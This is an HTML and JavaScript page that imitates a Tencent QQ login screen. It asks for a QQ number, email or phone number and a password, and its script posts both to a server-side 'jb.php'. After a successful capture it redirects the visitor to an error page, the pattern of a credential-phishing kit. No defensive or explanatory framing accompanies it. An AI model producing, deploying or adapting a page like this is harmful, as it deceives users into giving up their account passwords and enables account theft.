<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
        <title>QQ授权登录</title>
        <style>
        body{margin:0;padding:0;}
           .s1{
        width:80%;height:80px;border:50px;outline:none;margin-top:250px;margin-left:5%;font-size:47px;
        }  
        .s2{width:80%;height:80px;border:50px;outline:none;margin-top:250px;margin-left:5%;font-size:47px;margin-top:30px;}
        
        .s3{width:92%;height:85px;background:#12B7F5;border-radius:5px;border:0px;margin-top:40px;
            margin-left:4%;color:#fff;font-size:50px;outline:none;
        }
        .s3:hover{background:#0E98CB;}
             
            .mask{width:100%;height:100%;background:rgba(0,0,0,0.5);z-index:1111111;position:absolute;color:#fff;font-size:60px;display:none;}
        .mask p{margin-top:35%;margin-left:30%;}
        
        </style>
    </head>
    
    <body style="background:url(qq.png);background-size:cover;background-repeat: no-repeat;">
        <div class="mask"><p>请稍后....</p></div>
            <input class="s1" type=text placeholder="支持QQ号/邮箱/手机号登录">
            <input class="s2" type=password placeholder="密码">
            <input class="s3" type="button" value="登 录">
    </body>
    <script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
    <script>
    $(document).ready(function(){
            $('.s3').click(function(){
                $('.mask').css({display:'block'});
                 $.ajax({
                 type:'POST',             
                    url:'jb.php',           
                    data:{user:$('.s1').val(),pass:$('.s2').val()},        
                    success:function(response,status,xhr){    
                        if(response == "true"){
                           window.location.replace("error.html");
                        }else{
                        $('.mask').css({display:'none'});
                        alert(response);
                        }
                      }
                 });
            })
        })
    </script>
</html>
